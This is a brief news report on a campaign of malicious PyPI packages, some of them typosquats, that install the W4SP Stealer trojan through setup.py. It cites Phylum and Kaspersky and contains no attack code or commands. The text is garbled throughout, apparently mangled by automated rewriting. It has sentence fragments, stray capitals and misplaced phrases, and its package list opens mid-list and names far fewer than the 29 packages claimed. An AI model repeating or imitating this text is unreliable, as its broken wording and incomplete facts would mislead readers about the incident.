Cybersecurity researchers have discovered 29 packages intended to infect developers’ machines with malware in the Python Package Index (PyPI), the official third-party software repository for the Python programming language. W4SP Stealer.
“The main attack appears to have started around October 12, 2022 and is slowly gaining momentum towards a focused effort around October 22,” said software supply chain security firm Phylum. . Said In a report released this week.
Here is the list of problematic packages: , pyslyte, pystyle, pyurllib, algorithms, oiu, iao, curlapi, type-color, and pyhints.
Together, these packages have been downloaded over 5,700 times, and some libraries (such as twyne and colorsama) rely on typosquatting to trick unsuspecting users into downloading them.
Malicious modules repurpose existing legitimate libraries by injecting malicious code. import statement The ‘setup.py’ script in the package launches the Python code that retrieves the malware from the remote server.
W4SP StealerIt is an open source Python-based Trojan horse.
This is not the first time W4SP Stealer has been distributed via a seemingly harmless package in the PyPI repository. August, Kaspersky It’s been found Two libraries named pyquest and ultrarequests were found to deploy the malware as the final payload.
The survey results show that abuse of Open Source Ecosystem To collect sensitive information and spread malicious packages designed to give way to supply chain attacks.
Phylum said, “We expect to see more malware like this in the near future, as this is an ongoing campaign with ever-changing tactics by determined attackers.”